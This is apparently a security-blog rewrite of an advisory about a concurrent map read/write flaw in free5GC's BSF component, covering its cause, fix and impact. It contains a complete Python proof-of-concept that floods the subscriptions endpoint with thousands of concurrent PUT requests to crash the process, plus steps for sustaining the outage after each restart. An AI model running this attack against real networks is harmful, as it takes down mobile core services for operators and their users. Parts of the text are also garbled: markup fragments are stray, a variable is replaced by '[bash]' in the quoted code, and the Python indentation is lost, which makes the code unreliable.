Listen to this Post
The vulnerability (no official CVE yet, tracked as free5gc/free5gc926) resides in free5GC’s BSF component handling PUT /nbsf-management/v1/subscriptions/{subId}. The handler uses a global map `BsfSelf.Subscriptions` to store subscriptions. When processing a PUT request, it first calls `BSFContext.GetSubscription(subId)` which acquires a read lock (RLock()) and reads the map. If the subscription does not exist, the code falls into a create-if-absent branch inside ReplaceIndividualSubcription(). In this branch, the map is written directly without acquiring any lock: bsfContext.BsfSelf.Subscriptions
= subscription</code>. Under concurrent authenticated PUT requests with fresh `subId` values, one goroutine may be reading the map (holding the read lock) while another goroutine performs the unsafe write. The Go runtime detects this concurrent read/write on the same map and raises a fatal error: <code>fatal error: concurrent map read and map write</code>. This fatal cannot be recovered by Gin’s `recover()` middleware; it terminates the entire BSF process (exit code 2). The BSF container goes down, taking all nbsf-management SBI endpoints offline until manual restart. The attack requires a valid OAuth2 token for `nbsf-management` scope (PR:L), making it an authenticated denial-of-service (DoS) that can be repeated after every restart to sustain outage.
Platform: free5gc BSF
Version: v4.2.1
Vulnerability : concurrent map read/write DoS
Severity: Medium
date: 2026-03-22
<h2 style="color: blue;">Prediction: 2026-03-30 (patch merged in free5gc/bsf7)</h2>
<h2 style="color: blue;">What Undercode Say:</h2>
<h2 style="color: blue;">Analytics</h2>
[bash]
Check running BSF container
docker ps | grep bsf
Monitor BSF logs for fatal error
docker logs -f bsf 2>&1 | grep -E "fatal error|concurrent map"
Simulate concurrent PUT load (requires valid token)
cat > race_test.py << 'EOF'
import json, threading, urllib.request
TOKEN = "<valid_nbsf_management_jwt>"
BASE = "http://10.100.200.11:8000/nbsf-management/v1"
PAYLOAD = json.dumps({"events":["PCF_BINDING_CREATION"],"notifUri":"http://127.0.0.1/cb","notifCorreId":"1","supi":"imsi-208930000000003"}).encode()
def send_put(i,n):
url = f"{BASE}/subscriptions/race-mix-{i}-{n}"
req = urllib.request.Request(url, data=PAYLOAD, method="PUT")
req.add_header("Authorization", f"Bearer {TOKEN}")
req.add_header("Content-Type","application/json")
urllib.request.urlopen(req, timeout=2).read()
threads=[threading.Thread(target=send_put,args=(i,n)) for i in range(64) for n in range(50)]
for t in threads: t.start()
for t in threads: t.join()
EOF
python3 race_test.py
After crash, check container exit code
docker inspect bsf --format='{{.State.ExitCode}}'
Exploit:
Attacker obtains a valid `nbsf-management` token from the NRF (OAuth2 client credentials). Then sends 64+ concurrent PUT requests to `/nbsf-management/v1/subscriptions/{fresh_subId}` with random subId values (e.g., race-mix-{i}-{n}). The concurrent unsynchronized read/write triggers Go runtime fatal, killing BSF process. Repeat after restart to maintain DoS.
Protection from this CVE
Upgrade to free5gc/bsf commit that includes the fix from PR 7 (adds lock before unsafe write). Alternatively, apply patch: replace the inline write `bsfContext.BsfSelf.Subscriptions[bash] = subscription` with a call to a locked helper like CreateSubscription(). As a temporary mitigation, rate-limit PUT requests on the `/nbsf-management/v1/subscriptions` endpoint or require manual review of high-concurrency sources.
Impact
Complete availability loss of BSF's nbsf-management SBI interface (PCF binding lookups, AF sessions). Attack requires only low-privileged authenticated access (nbsf-management token). No confidentiality or integrity impact. Entire BSF process exits, crashing the container (exit code 2). Service remains down until operator restarts the container; attacker can re-trigger immediately after restart, causing sustained DoS.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
